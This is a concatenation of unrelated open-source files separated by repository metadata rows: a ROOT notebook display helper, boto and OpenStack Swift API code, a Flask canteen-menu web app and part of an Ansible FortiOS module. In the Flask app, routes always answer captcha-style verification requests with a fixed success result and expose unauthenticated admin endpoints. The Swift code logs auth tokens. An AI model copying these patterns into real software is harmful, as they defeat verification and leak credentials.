processCppCode(".L %s+" %fileName)
transformers = []
class StreamCapture(object):
def __init__(self, ip=get_ipython()):
# For the registration
self.shell = ip
self.ioHandler = handlers.IOHandler()
self.flag = True
self.outString = ""
self.errString = ""
self.asyncCapturer = handlers.Runner(self.syncCapture)
self.isFirstPreExecute = True
self.isFirstPostExecute = True
def syncCapture(self, defout = ''):
self.outString = defout
self.errString = defout
waitTimes = [.01, .01, .02, .04, .06, .08, .1]
lenWaitTimes = 7
iterIndex = 0
while self.flag:
self.ioHandler.Poll()
if not self.flag: return
waitTime = .1 if iterIndex >= lenWaitTimes else waitTimes[iterIndex]
time.sleep(waitTime)
def pre_execute(self):
if self.isFirstPreExecute:
self.isFirstPreExecute = False
return 0
self.flag = True
self.ioHandler.Clear()
self.ioHandler.InitCapture()
self.asyncCapturer.AsyncRun('')
def post_execute(self):
if self.isFirstPostExecute:
self.isFirstPostExecute = False
self.isFirstPreExecute = False
return 0
self.flag = False
self.asyncCapturer.Wait()
self.ioHandler.Poll()
self.ioHandler.EndCapture()
# Print for the notebook
out = self.ioHandler.GetStdout()
err = self.ioHandler.GetStderr()
if not transformers:
sys.stdout.write(out)
sys.stderr.write(err)
else:
for t in transformers:
(out, err, otype) = t(out, err)
if otype == 'html':
IPython.display.display(HTML(out))
IPython.display.display(HTML(err))
return 0
def register(self):
self.shell.events.register('pre_execute', self.pre_execute)
self.shell.events.register('post_execute', self.post_execute)
def GetCanvasDrawers():
lOfC = ROOT.gROOT.GetListOfCanvases()
return [NotebookDrawer(can) for can in lOfC if can.IsDrawn()]
def GetGeometryDrawer():
if not hasattr(ROOT,'gGeoManager'): return
if not ROOT.gGeoManager: return
if not ROOT.gGeoManager.GetUserPaintVolume(): return
vol = ROOT.gGeoManager.GetTopVolume()
if vol:
return NotebookDrawer(vol)
def GetDrawers():
drawers = GetCanvasDrawers()
geometryDrawer = GetGeometryDrawer()
if geometryDrawer: drawers.append(geometryDrawer)
return drawers
def DrawGeometry():
drawer = GetGeometryDrawer()
if drawer:
drawer.Draw()
def DrawCanvases():
drawers = GetCanvasDrawers()
for drawer in drawers:
drawer.Draw()
def NotebookDraw():
DrawGeometry()
DrawCanvases()
class CaptureDrawnPrimitives(object):
'''
Capture the canvas which is drawn to display it.
'''
def __init__(self, ip=get_ipython()):
self.shell = ip
def _post_execute(self):
NotebookDraw()
def register(self):
self.shell.events.register('post_execute', self._post_execute)
class NotebookDrawer(object):
'''
Capture the canvas which is drawn and decide if it should be displayed using
jsROOT.
'''
jsUID = 0
def __init__(self, theObject):
self.drawableObject = theObject
self.isCanvas = self.drawableObject.ClassName() == "TCanvas"
def __del__(self):
if self.isCanvas:
self.drawableObject.ResetDrawn()
else:
ROOT.gGeoManager.SetUserPaintVolume(None)
def _getListOfPrimitivesNamesAndTypes(self):
"""
Get the list of primitives in the pad, recursively descending into
histograms and graphs looking for fitted functions.
"""
primitives = self.drawableObject.GetListOfPrimitives()
primitivesNames = map(lambda p: p.ClassName(), primitives)
return sorted(primitivesNames)
def _getUID(self):
'''
Every DIV containing a JavaScript snippet must be unique in the
        notebook. This method provides a unique identifier.
'''
NotebookDrawer.jsUID += 1
return NotebookDrawer.jsUID
def _canJsDisplay(self):
if not TBufferJSONAvailable():
return False
if not self.isCanvas: return True
# to be optimised
if not _enableJSVis: return False
primitivesTypesNames = self._getListOfPrimitivesNamesAndTypes()
for unsupportedPattern in _jsNotDrawableClassesPatterns:
for primitiveTypeName in primitivesTypesNames:
if fnmatch.fnmatch(primitiveTypeName,unsupportedPattern):
print("The canvas contains an object of a type jsROOT cannot currently handle (%s). Falling back to a static png." %primitiveTypeName, file=sys.stderr)
return False
return True
def _getJsCode(self):
# Workaround to have ConvertToJSON work
json = ROOT.TBufferJSON.ConvertToJSON(self.drawableObject, 3)
# Here we could optimise the string manipulation
divId = 'root_plot_' + str(self._getUID())
        width = _jsCanvasWidth
        height = _jsCanvasHeight
        options = "all"
        if self.isCanvas:
            width = self.drawableObject.GetWw()
            height = self.drawableObject.GetWh()
            options = ""
        thisJsCode = _jsCode.format(jsCanvasWidth = width,
                                    jsCanvasHeight = height,
jsROOTSourceDir = _jsROOTSourceDir,
jsonContent = json.Data(),
jsDrawOptions = options,
jsDivId = divId)
return thisJsCode
def _getJsDiv(self):
return HTML(self._getJsCode())
def _jsDisplay(self):
IPython.display.display(self._getJsDiv())
return 0
def _getPngImage(self):
ofile = tempfile.NamedTemporaryFile(suffix=".png")
with _setIgnoreLevel(ROOT.kError):
self.drawableObject.SaveAs(ofile.name)
img = IPython.display.Image(filename=ofile.name, format='png', embed=True)
return img
def _pngDisplay(self):
img = self._getPngImage()
IPython.display.display(img)
def _display(self):
if _enableJSVisDebug:
self._pngDisplay()
self._jsDisplay()
else:
if self._canJsDisplay():
self._jsDisplay()
else:
self._pngDisplay()
def GetDrawableObjects(self):
if not self.isCanvas:
return [self._getJsDiv()]
if _enableJSVisDebug:
return [self._getJsDiv(),self._getPngImage()]
if self._canJsDisplay():
return [self._getJsDiv()]
else:
return [self._getPngImage()]
def Draw(self):
self._display()
return 0
def setStyle():
style=ROOT.gStyle
style.SetFuncWidth(2)
captures = []
def loadMagicsAndCapturers():
global captures
extNames = ["JupyROOT.magics." + name for name in ["cppmagic","jsrootmagic"]]
ip = get_ipython()
extMgr = ExtensionManager(ip)
for extName in extNames:
extMgr.load_extension(extName)
captures.append(StreamCapture())
captures.append(CaptureDrawnPrimitives())
for capture in captures: capture.register()
def declareProcessLineWrapper():
ROOT.gInterpreter.Declare("""
TInterpreter::EErrorCode ProcessLineWrapper(const char* line) {
TInterpreter::EErrorCode err;
gInterpreter->ProcessLine(line, &err);
return err;
}
""")
def enhanceROOTModule():
ROOT.enableJSVis = enableJSVis
ROOT.disableJSVis = disableJSVis
ROOT.enableJSVisDebug = enableJSVisDebug
ROOT.disableJSVisDebug = disableJSVisDebug
def enableCppHighlighting():
ipDispJs = IPython.display.display_javascript
# Define highlight mode for %%cpp magic
ipDispJs(_jsMagicHighlight.format(cppMIME = cppMIME), raw=True)
def iPythonize():
setStyle()
loadMagicsAndCapturers()
declareProcessLineWrapper()
#enableCppHighlighting()
enhanceROOTModule()
welcomeMsg()
| lgpl-2.1 | -7,166,167,120,123,723,000 | 27.619329 | 171 | 0.627154 | false |
IsCoolEntertainment/debpkg_python-boto | boto/ec2/elb/securitygroup.py | 57 | 1576 | # Copyright (c) 2010 Reza Lotun http://reza.lotun.name
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class SecurityGroup(object):
def __init__(self, connection=None):
self.name = None
self.owner_alias = None
def __repr__(self):
return 'SecurityGroup(%s, %s)' % (self.name, self.owner_alias)
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'GroupName':
self.name = value
elif name == 'OwnerAlias':
self.owner_alias = value
| mit | -3,766,237,517,782,144,500 | 40.473684 | 74 | 0.712563 | false |
eoncloud-dev/eonboard | eoncloud_web/cloud/api/swift.py | 10 | 11697 | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import six.moves.urllib.parse as urlparse
import swiftclient
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon.utils.memoized import memoized # noqa
from openstack_dashboard.api import base
from openstack_dashboard.openstack.common import timeutils
LOG = logging.getLogger(__name__)
FOLDER_DELIMITER = "/"
# Swift ACL
GLOBAL_READ_ACL = ".r:*"
LIST_CONTENTS_ACL = ".rlistings"
class Container(base.APIDictWrapper):
pass
class StorageObject(base.APIDictWrapper):
def __init__(self, apidict, container_name, orig_name=None, data=None):
super(StorageObject, self).__init__(apidict)
self.container_name = container_name
self.orig_name = orig_name
self.data = data
@property
def id(self):
return self.name
class PseudoFolder(base.APIDictWrapper):
def __init__(self, apidict, container_name):
super(PseudoFolder, self).__init__(apidict)
self.container_name = container_name
@property
def id(self):
return '%s/%s' % (self.container_name, self.name)
@property
def name(self):
return self.subdir.rstrip(FOLDER_DELIMITER)
@property
def bytes(self):
return None
@property
def content_type(self):
return "application/pseudo-folder"
def _objectify(items, container_name):
"""Splits a listing of objects into their appropriate wrapper classes."""
objects = []
# Deal with objects and object pseudo-folders first, save subdirs for later
for item in items:
if item.get("subdir", None) is not None:
object_cls = PseudoFolder
else:
object_cls = StorageObject
objects.append(object_cls(item, container_name))
return objects
def _metadata_to_header(metadata):
headers = {}
public = metadata.get('is_public')
if public is True:
public_container_acls = [GLOBAL_READ_ACL, LIST_CONTENTS_ACL]
headers['x-container-read'] = ",".join(public_container_acls)
elif public is False:
headers['x-container-read'] = ""
return headers
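# Illustrative sketch (not part of the original module): expected output of the
# helper above for the three possible 'is_public' cases.
def _example_metadata_to_header():
    assert _metadata_to_header({'is_public': True}) == {
        'x-container-read': GLOBAL_READ_ACL + ',' + LIST_CONTENTS_ACL}
    assert _metadata_to_header({'is_public': False}) == {'x-container-read': ''}
    assert _metadata_to_header({}) == {}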
@memoized
def swift_api(request):
endpoint = base.url_for(request, 'object-store')
cacert = getattr(settings, 'OPENSTACK_SSL_CACERT', None)
insecure = getattr(settings, 'OPENSTACK_SSL_NO_VERIFY', False)
LOG.debug('Swift connection created using token "%s" and url "%s"'
% (request.user.token.id, endpoint))
return swiftclient.client.Connection(None,
request.user.username,
None,
preauthtoken=request.user.token.id,
preauthurl=endpoint,
cacert=cacert,
insecure=insecure,
auth_version="2.0")
def swift_container_exists(request, container_name):
try:
swift_api(request).head_container(container_name)
return True
except swiftclient.client.ClientException:
return False
def swift_object_exists(request, container_name, object_name):
try:
swift_api(request).head_object(container_name, object_name)
return True
except swiftclient.client.ClientException:
return False
def swift_get_containers(request, marker=None):
limit = getattr(settings, 'API_RESULT_LIMIT', 1000)
headers, containers = swift_api(request).get_account(limit=limit + 1,
marker=marker,
full_listing=True)
container_objs = [Container(c) for c in containers]
if(len(container_objs) > limit):
return (container_objs[0:-1], True)
else:
return (container_objs, False)
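# Note (added for clarity, not in the original module): swift_get_containers
# requests limit + 1 entries; receiving more than 'limit' results means a
# further page exists, so the extra entry is dropped and True is returned as
# the "has more" flag alongside the page.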
def swift_get_container(request, container_name, with_data=True):
if with_data:
headers, data = swift_api(request).get_object(container_name, "")
else:
data = None
headers = swift_api(request).head_container(container_name)
timestamp = None
is_public = False
public_url = None
try:
is_public = GLOBAL_READ_ACL in headers.get('x-container-read', '')
if is_public:
swift_endpoint = base.url_for(request,
'object-store',
endpoint_type='publicURL')
public_url = swift_endpoint + '/' + urlparse.quote(container_name)
ts_float = float(headers.get('x-timestamp'))
timestamp = timeutils.iso8601_from_timestamp(ts_float)
except Exception:
pass
container_info = {
'name': container_name,
'container_object_count': headers.get('x-container-object-count'),
'container_bytes_used': headers.get('x-container-bytes-used'),
'timestamp': timestamp,
'data': data,
'is_public': is_public,
'public_url': public_url,
}
return Container(container_info)
def swift_create_container(request, name, metadata=({})):
if swift_container_exists(request, name):
raise exceptions.AlreadyExists(name, 'container')
headers = _metadata_to_header(metadata)
swift_api(request).put_container(name, headers=headers)
return Container({'name': name})
def swift_update_container(request, name, metadata=({})):
headers = _metadata_to_header(metadata)
swift_api(request).post_container(name, headers=headers)
return Container({'name': name})
def swift_delete_container(request, name):
    # It cannot be deleted if it's not empty. The batch removal of objects
    # should be done in swiftclient instead of Horizon.
objects, more = swift_get_objects(request, name)
if objects:
error_msg = unicode(_("The container cannot be deleted "
"since it's not empty."))
exc = exceptions.Conflict(error_msg)
exc._safe_message = error_msg
raise exc
swift_api(request).delete_container(name)
return True
def swift_get_objects(request, container_name, prefix=None, marker=None,
limit=None):
limit = limit or getattr(settings, 'API_RESULT_LIMIT', 1000)
kwargs = dict(prefix=prefix,
marker=marker,
limit=limit + 1,
delimiter=FOLDER_DELIMITER,
full_listing=True)
headers, objects = swift_api(request).get_container(container_name,
**kwargs)
object_objs = _objectify(objects, container_name)
if(len(object_objs) > limit):
return (object_objs[0:-1], True)
else:
return (object_objs, False)
def swift_filter_objects(request, filter_string, container_name, prefix=None,
marker=None):
# FIXME(kewu): Swift currently has no real filtering API, thus the marker
# parameter here won't actually help the pagination. For now I am just
# getting the largest number of objects from a container and filtering
# based on those objects.
limit = 9999
objects = swift_get_objects(request,
container_name,
prefix=prefix,
marker=marker,
limit=limit)
filter_string_list = filter_string.lower().strip().split(' ')
def matches_filter(obj):
for q in filter_string_list:
return wildcard_search(obj.name.lower(), q)
return filter(matches_filter, objects[0])
def wildcard_search(string, q):
q_list = q.split('*')
if all(map(lambda x: x == '', q_list)):
return True
elif q_list[0] not in string:
return False
else:
if q_list[0] == '':
tail = string
else:
head, delimiter, tail = string.partition(q_list[0])
return wildcard_search(tail, '*'.join(q_list[1:]))
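# Illustrative sketch (not part of the original module): behaviour of the
# recursive matcher above. Every piece of the pattern between '*' characters
# must occur in the string, in order.
def _example_wildcard_search():
    assert wildcard_search('my_container', 'my*')       # leading piece found
    assert wildcard_search('my_container', '*tain*')    # middle piece found
    assert not wildcard_search('my_container', 'foo*')  # leading piece missing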
def swift_copy_object(request, orig_container_name, orig_object_name,
new_container_name, new_object_name):
if swift_object_exists(request, new_container_name, new_object_name):
raise exceptions.AlreadyExists(new_object_name, 'object')
headers = {"X-Copy-From": FOLDER_DELIMITER.join([orig_container_name,
orig_object_name])}
return swift_api(request).put_object(new_container_name,
new_object_name,
None,
headers=headers)
def swift_upload_object(request, container_name, object_name,
object_file=None):
headers = {}
size = 0
if object_file:
headers['X-Object-Meta-Orig-Filename'] = object_file.name
size = object_file.size
etag = swift_api(request).put_object(container_name,
object_name,
object_file,
headers=headers)
obj_info = {'name': object_name, 'bytes': size, 'etag': etag}
return StorageObject(obj_info, container_name)
def swift_create_pseudo_folder(request, container_name, pseudo_folder_name):
headers = {}
etag = swift_api(request).put_object(container_name,
pseudo_folder_name,
None,
headers=headers)
obj_info = {
'name': pseudo_folder_name,
'etag': etag
}
return PseudoFolder(obj_info, container_name)
def swift_delete_object(request, container_name, object_name):
swift_api(request).delete_object(container_name, object_name)
return True
def swift_get_object(request, container_name, object_name, with_data=True):
if with_data:
headers, data = swift_api(request).get_object(container_name,
object_name)
else:
data = None
headers = swift_api(request).head_object(container_name,
object_name)
orig_name = headers.get("x-object-meta-orig-filename")
timestamp = None
try:
ts_float = float(headers.get('x-timestamp'))
timestamp = timeutils.iso8601_from_timestamp(ts_float)
except Exception:
pass
obj_info = {
'name': object_name,
'bytes': headers.get('content-length'),
'content_type': headers.get('content-type'),
'etag': headers.get('etag'),
'timestamp': timestamp,
}
return StorageObject(obj_info,
container_name,
orig_name=orig_name,
data=data)
| apache-2.0 | 1,103,970,919,797,390,500 | 33.402941 | 79 | 0.589553 | false |
arcsun/neteaseMenu | start.py | 1 | 11671 | #coding=utf-8
from flask import Flask, redirect, render_template, request, Response
from codepy import menulog
import anydbm as dbm
import shelve
import os, sys
import urllib
from datetime import datetime
import time
import urllib2
import hashlib
app = Flask(__name__)
visit = 0
visitHome = 0
startTime = time.time()
token = 'hzsunzhengyu' # token of the WeChat official account; set your own value
cache = {}
s = None
def checkSign(signature, timestamp, nonce):
    # WeChat signature verification
args = []
args.append("token=%s" % token)
args.append("timestamp=%s" % timestamp)
args.append("nonce=%s" % nonce)
args = sorted(args)
raw = "&".join(args)
sign = hashlib.sha1(raw).hexdigest()
menulog.info(signature)
menulog.info(sign)
return signature == sign
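# Illustrative sketch (not part of the original app): the check above takes the
# SHA-1 of the sorted, '&'-joined key=value parameters. The timestamp and nonce
# below are made-up example values.
def _example_check_sign():
    timestamp, nonce = '1400000000', '12345'
    raw = "&".join(sorted(["token=%s" % token,
                           "timestamp=%s" % timestamp,
                           "nonce=%s" % nonce]))
    return checkSign(hashlib.sha1(raw).hexdigest(), timestamp, nonce)  # True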
def saveCache(key, content):
"""
    Pages now have to be fetched through this server, so keep a simple cache here.
"""
if len(cache) >= 10:
cache.clear()
cache[key] = content
def addOne(page= 1):
"""访问计数"""
try:
if not s:
globals()['s'] = shelve.open('visit_count.dat', writeback=True)
if page == 0:
s['count_home'] = 0 if s.get('count_home') is None else s['count_home']+1
elif page == 1:
s['count_menu'] = 0 if s.get('count_menu') is None else s['count_menu']+1
s.sync()
except Exception as e:
menulog.debug(e)
@app.route('/menu/cache')
def getCache():
return str(cache.keys())
def getWebContent(url):
try:
fname = url.split('?')[1].replace('=', '_')
if cache.get(fname):
return cache.get(fname)
else:
            req = urllib2.Request(url+ '&companyId=1') # update: this parameter was added later
req.add_header('User-Agent', 'Mozilla/5.0 (Linux; Android 6.0; PRO 6 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.130 Mobile Safari/537.36 YiXin/4.8.3')
res = urllib2.urlopen(req)
html = res.read().decode('utf-8')
saveCache(fname, html)
return html
except Exception as e:
menulog.debug(str(e))
return ''
@app.route('/')
def hello_world():
return redirect('/menu')
@app.route('/menus/sign')
def weixin_sign():
    # WeChat server configuration verification
menulog.info('weixin sign')
signature = request.args.get('signature', '')
timestamp = request.args.get('timestamp', '')
nonce = request.args.get('nonce', '')
echostr = request.args.get('echostr', '')
valid = checkSign(signature, timestamp, nonce)
if valid:
return echostr
else:
        # The signature check currently has a bug, so always return echostr for now
return echostr
@app.route('/menu/<int:day>', methods = ['GET', 'POST'])
def menu(day=0):
    # 0 = today, 1 = tomorrow, or a specific date such as 151202
if request.method == 'POST':
day = int(request.form['day'])
    # update: Yixin now checks the User-Agent, so the relayed endpoint must be used
return redirect('/menus/%s'% day)
# from codepy import menu
# globals()['visit'] += 1
# menulog.info(u'访问菜单@%s'% visit)
# url = menu.Menu(day).process()
# if url.startswith('http'):
# return redirect(url)
# else:
# return url
@app.route('/menus/<int:day>', methods = ['GET', 'POST'])
def menus(day=0):
    # Added to work around redirects getting stuck inside WeChat
    # The server fetches the page from Yixin and returns it to the user
from codepy import menu
if request.method == 'POST':
day = int(request.form['day'])
addOne(1)
globals()['visit'] += 1
menulog.info(u'访问菜单@%s'% visit)
url = menu.Menu(day).process()
if url.startswith('http'):
return getWebContent(url)
else:
return url
@app.route('/menus/bus')
def bus():
    # Shuttle bus route page, relayed through this server
addOne(1)
globals()['visit'] += 1
menulog.info(u'访问菜单@%s'% visit)
url = "http://numenplus.yixin.im/multiNewsWap.do?multiNewsId=17011" # 更新周期很长,暂手动更新
try:
return getWebContent(url)
except:
return u'网页访问出错'
def getWeekDayFromDay(daytime):
"""根据日期(如20160517)计算是星期几"""
try:
daytime = '20'+ str(daytime) # '20160517'
year = int(daytime[:4]) # 2016
month = int(daytime[4:6]) # 5
day = int(daytime[6:8]) # 17
weekday = datetime(year, month, day, 0, 0, 0, 0).weekday()
weekdaynames= {
0: u'星期一',
1: u'星期二',
2: u'星期三',
3: u'星期四',
4: u'星期五',
5: u'星期六',
6: u'星期日',
}
return weekdaynames.get(weekday, u'')
except:
menulog.debug(u'获取星期几错误')
return u''
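# Illustrative sketch (not part of the original app): 160517 expands to
# 2016-05-17, which was a Tuesday.
def _example_weekday():
    assert getWeekDayFromDay(160517) == u'星期二'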
@app.route('/menu')
def menuList():
addOne(0)
globals()['visitHome'] += 1
menulog.info(u'访问主页@%s'% visitHome)
try:
db = dbm.open('datafile', 'c')
cache = eval(db['cache'])
future = eval(db['future'])
maybe = eval(db['maybe'])
maybe.sort()
vals = {}
for day in future:
vals[day] = cache[day]
db.close()
weekdays = {}
for day in vals.keys():
weekdays[day] = getWeekDayFromDay(day)
return render_template('menu.html', vals= vals, days= future, weekdays= weekdays, maybe= maybe, total=(s.get('count_menu'), s.get('count_home')))
except (IOError, KeyError):
msg = u'缓存读取错误'
menulog.info(msg)
return msg
@app.route('/menu/manage/hzmenu')
def manage():
seconds = int(time.time()- startTime)
days = seconds/(24*60*60)
if days >= 1:
seconds -= 24*60*60*days
hours = seconds/(60*60)
if hours >= 1:
seconds -= 60*60*hours
miniutes = seconds/60
if miniutes >= 1:
seconds -= 60*miniutes
timestr = u'本次已运行:%s天%s小时%s分钟%s秒'% (days, hours, miniutes, seconds)
return render_template('manage.html', visit= visit, visitHome= visitHome, timestr= timestr, total=(s.get('count_menu'), s.get('count_home')))
@app.route('/menu/info')
def info():
try:
db = dbm.open('datafile', 'r')
msg = str(db)
db.close()
return msg
except (IOError, KeyError):
return u'缓存读取错误'
@app.route('/menu/delete/<int:day>', methods = ['GET', 'POST'])
def delete(day= 150101):
try:
db = dbm.open('datafile', 'w')
if request.method == 'POST':
day = int(request.form['day'])
cache = eval(db['cache'])
if cache.has_key(day):
del cache[day]
msg = u'删除%s'% day
else:
msg = u'del key not found'
menulog.info(msg)
db['cache'] = str(cache)
db.close()
return msg
except (IOError, KeyError):
return u'缓存读取错误'
@app.route('/menu/delfuture/<int:day>', methods = ['GET', 'POST'])
def delfuture(day= 161300):
try:
db = dbm.open('datafile', 'w')
if request.method == 'POST':
day = int(request.form['day'])
future = eval(db['future'])
if day in future:
future.remove(day)
msg = u'删除%s'% day
else:
msg = u'del key not found'
menulog.info(msg)
db['future'] = str(future)
db.close()
delete(day)
return msg
except (IOError, KeyError) as e:
print e
return u'缓存读取错误'
@app.route('/menu/refreshlist')
def refreshlist():
try:
db = dbm.open('datafile', 'w')
cache = eval(db['cache'])
future = []
today = int(time.strftime('%y%m%d',time.localtime(time.time())))
for day in cache.keys():
if day >= today:
future.append(day)
future.sort()
db['future'] = str(future)
msg = u'更新%s后已找到的菜单列表 from homepage'% today
menulog.info(msg)
db.close()
return msg
except (IOError, KeyError):
return u'缓存读取错误'
@app.route('/menu/clear')
def clearMaybe():
    # Clear the list of candidate menus (maybe=[])
try:
db = dbm.open('datafile', 'w')
db['maybe'] = '[]'
db.close()
msg = u'清空maybe'
menulog.info(msg)
return msg
except (IOError, KeyError):
msg = u'缓存读取错误'
menulog.info(msg)
return msg
@app.route('/menu/start/<int:startid>', methods = ['GET', 'POST'])
def start(startid= 17000):
    # Set the search start ID to the given value
try:
if request.method == 'POST':
startid = int(request.form['startid'])
db = dbm.open('datafile', 'w')
db['startId'] = str(startid)
db.close()
msg = u'设置查找起点ID为:%d'% startid
menulog.info(msg)
return msg
except (IOError, KeyError):
msg = u'缓存/POST参数读取错误'
menulog.info(msg)
return msg
@app.route('/menu/add/<int:day>/<int:mid>', methods = ['GET', 'POST'])
def add(day= 151203, mid= 17063):
    # Manually add a menu (the publisher occasionally enters a wrong date)
try:
db = dbm.open('datafile', 'w')
cache = eval(db['cache'])
if request.method == 'POST':
day = int(request.form['day'])
mid = int(request.form['mid'])
cache[day] = mid
db['cache'] = str(cache)
msg = u'更新%s的菜单id为%s'% (day, mid)
menulog.info(msg)
db.close()
return msg
except (IOError, KeyError):
msg = u'缓存/POST参数读取错误'
menulog.info(msg)
return msg
@app.route('/menu/log/<int:lines>')
def readLog(lines= 0):
    # Read the given number of log lines, 0 means all
f = None
try:
files = os.listdir('./')
files.sort()
logs = []
for fname in files:
if fname.startswith('menu.log'):
logs.append(fname)
if logs:
f = open(logs[-1])
contents = f.readlines()
content = ''
if lines == 0:
lines = len(contents)
line = 0
for msg in reversed(contents):
line += 1
if line < lines:
content += msg+ '<br>'
else:
break
return content.decode('utf-8')
else:
return u'暂无日志'
except IOError:
return '读取日志出错'
finally:
if f:
f.close()
@app.route('/api/v1/verify', methods=['POST', 'GET'])
def mockYidun():
resp = Response('{"msg":"success","result":true,"c":1,"error":0}')
resp.headers['Content-Type'] = 'application/json;charset=UTF-8'
return resp
@app.route('/api/v2/verify', methods=['POST', 'GET'])
def mockYidun2():
resp = Response('{"msg":"success","result":true,"c":1,"error":0}')
resp.headers['Content-Type'] = 'application/json;charset=UTF-8'
return resp
if __name__ == '__main__':
if sys.platform.startswith('win'):
        # local debugging
# import webbrowser
# webbrowser.open('http://127.0.0.1:80/menu')
app.run(host='127.0.0.1', port= 80, debug= True)
elif len(sys.argv)> 1:
        # online debugging; pass any extra argument to enable
app.run(host='0.0.0.0', port= 5000, debug= True)
else:
        # production deployment, launched with gunicorn
from werkzeug.contrib.fixers import ProxyFix
app.wsgi_app = ProxyFix(app.wsgi_app)
app.run(host='0.0.0.0', port= 5000)
| apache-2.0 | -3,355,608,342,837,316,600 | 25.896296 | 205 | 0.541357 | false |
gregdek/ansible | lib/ansible/modules/network/fortios/fortios_firewall_address.py | 7 | 15896 | #!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2018 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# The library uses Python logging; you can capture its output if logging is
# enabled in your Ansible config.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_firewall_address
short_description: Configure IPv4 addresses.
description:
- This module is able to configure a FortiGate or FortiOS by
allowing the user to configure firewall feature and address category.
      Examples include all options and need to be adjusted to datasources before usage.
Tested with FOS v6.0.2
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
            - FortiOS or FortiGate ip address.
required: true
username:
description:
- FortiOS or FortiGate username.
required: true
password:
description:
- FortiOS or FortiGate password.
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS
protocol
type: bool
default: false
firewall_address:
description:
- Configure IPv4 addresses.
default: null
suboptions:
state:
description:
- Indicates whether to create or remove the object
choices:
- present
- absent
allow-routing:
description:
- Enable/disable use of this address in the static route configuration.
choices:
- enable
- disable
associated-interface:
description:
- Network interface associated with address. Source system.interface.name system.zone.name.
cache-ttl:
description:
- Defines the minimal TTL of individual IP addresses in FQDN cache measured in seconds.
color:
description:
- Color of icon on the GUI.
comment:
description:
- Comment.
country:
description:
- IP addresses associated to a specific country.
end-ip:
description:
- Final IP address (inclusive) in the range for the address.
epg-name:
description:
- Endpoint group name.
filter:
description:
- Match criteria filter.
fqdn:
description:
- Fully Qualified Domain Name address.
list:
description:
- IP address list.
suboptions:
ip:
description:
- IP.
required: true
name:
description:
- Address name.
required: true
obj-id:
description:
- Object ID for NSX.
organization:
description:
- "Organization domain name (Syntax: organization/domain)."
policy-group:
description:
- Policy group name.
sdn:
description:
- SDN.
choices:
- aci
- aws
- azure
- gcp
- nsx
- nuage
- oci
sdn-tag:
description:
- SDN Tag.
start-ip:
description:
- First IP address (inclusive) in the range for the address.
subnet:
description:
- IP address and subnet mask of address.
subnet-name:
description:
- Subnet name.
tagging:
description:
- Config object tagging.
suboptions:
category:
description:
- Tag category. Source system.object-tagging.category.
name:
description:
- Tagging entry name.
required: true
tags:
description:
- Tags.
suboptions:
name:
description:
- Tag name. Source system.object-tagging.tags.name.
required: true
tenant:
description:
- Tenant.
type:
description:
- Type of address.
choices:
- ipmask
- iprange
- fqdn
- geography
- wildcard
- wildcard-fqdn
- dynamic
uuid:
description:
- Universally Unique Identifier (UUID; automatically assigned but can be manually reset).
visibility:
description:
- Enable/disable address visibility in the GUI.
choices:
- enable
- disable
wildcard:
description:
- IP address and wildcard netmask.
wildcard-fqdn:
description:
- Fully Qualified Domain Name with wildcard characters.
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
tasks:
- name: Configure IPv4 addresses.
fortios_firewall_address:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
firewall_address:
state: "present"
allow-routing: "enable"
associated-interface: "<your_own_value> (source system.interface.name system.zone.name)"
cache-ttl: "5"
color: "6"
comment: "Comment."
country: "<your_own_value>"
end-ip: "<your_own_value>"
epg-name: "<your_own_value>"
filter: "<your_own_value>"
fqdn: "<your_own_value>"
list:
-
ip: "<your_own_value>"
name: "default_name_15"
obj-id: "<your_own_value>"
organization: "<your_own_value>"
